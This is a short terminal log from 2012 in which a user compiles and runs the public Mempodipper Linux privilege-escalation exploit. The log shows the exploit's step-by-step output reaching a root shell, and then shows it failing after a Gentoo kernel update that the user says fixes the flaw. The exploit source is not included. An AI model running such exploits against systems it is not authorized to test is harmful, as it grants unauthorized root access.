
bug gentoozo

Jan 24th, 2012
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  1. [dexter4@Kagamine:~]% cp memprodiper memprodiper.c
  2. [dexter4@Kagamine:~]% rm memprodiper
  3. [dexter4@Kagamine:~]% gcc memprodiper.c -o memprodiper
  4. [dexter4@Kagamine:~]% ./memprodiper
  5. ===============================
  6. = Mempodipper =
  7. = by zx2c4 =
  8. = Jan 21, 2012 =
  9. ===============================
  11. [+] Ptracing su to find next instruction without reading binary.
  12. [+] Creating ptrace pipe.
  13. [+] Forking ptrace child.
  14. [+] Waiting for ptraced child to give output on syscalls.
  15. [+] Ptrace_traceme'ing process.
  16. [+] Error message written. Single stepping to find address.
  17. [+] Resolved call address to 0x8049b68.
  18. [+] Opening socketpair.
  19. [+] Waiting for transferred fd in parent.
  20. [+] Executing child from child fork.
  21. [+] Opening parent mem /proc/9700/mem in child.
  22. [+] Sending fd 6 to parent.
  23. [+] Received fd at 6.
  24. [+] Assigning fd 6 to stderr.
  25. [+] Calculating su padding.
  26. [+] Seeking to offset 0x8049b58.
  27. [+] Executing su with shellcode.
  28. sh-4.1# whoami
  29. root
  30. sh-4.1# exit
  31. exit
  33. en Gentoo la version gentoo-sources-3.2.1-r2 soluciona el problema de seguridad >_<
  35. [dexter4@Kagamine:~]% ./memprodiper
  36. ===============================
  37. = Mempodipper =
  38. = by zx2c4 =
  39. = Jan 21, 2012 =
  40. ===============================
  42. [+] Ptracing su to find next instruction without reading binary.
  43. [+] Creating ptrace pipe.
  44. [+] Forking ptrace child.
  45. [+] Waiting for ptraced child to give output on syscalls.
  46. [+] Ptrace_traceme'ing process.
  47. [+] Error message written. Single stepping to find address.
  48. [+] Resolved call address to 0x8049b68.
  49. [+] Opening socketpair.
  50. [+] Waiting for transferred fd in parent.
  51. [+] Executing child from child fork.
  52. [+] Opening parent mem /proc/3617/mem in child.
  53. [+] Sending fd 6 to parent.
  54. [+] Received fd at 6.
  55. [+] Assigning fd 6 to stderr.
  56. [+] Calculating su padding.
  57. [+] Seeking to offset 0x8049b58.
  58. [+] Executing su with shellcode.
  59. [dexter4@Kagamine:~]% uname -a
  60. Linux Kagamine 3.2.1-gentoo-r2 #1 PREEMPT Wed Jan 25 11:13:29 CLST 2012 i686 Intel(R) Pentium(R) 4 CPU 1.60GHz GenuineIntel GNU/Linux
  62. lero lero, ahora no funciona ;)
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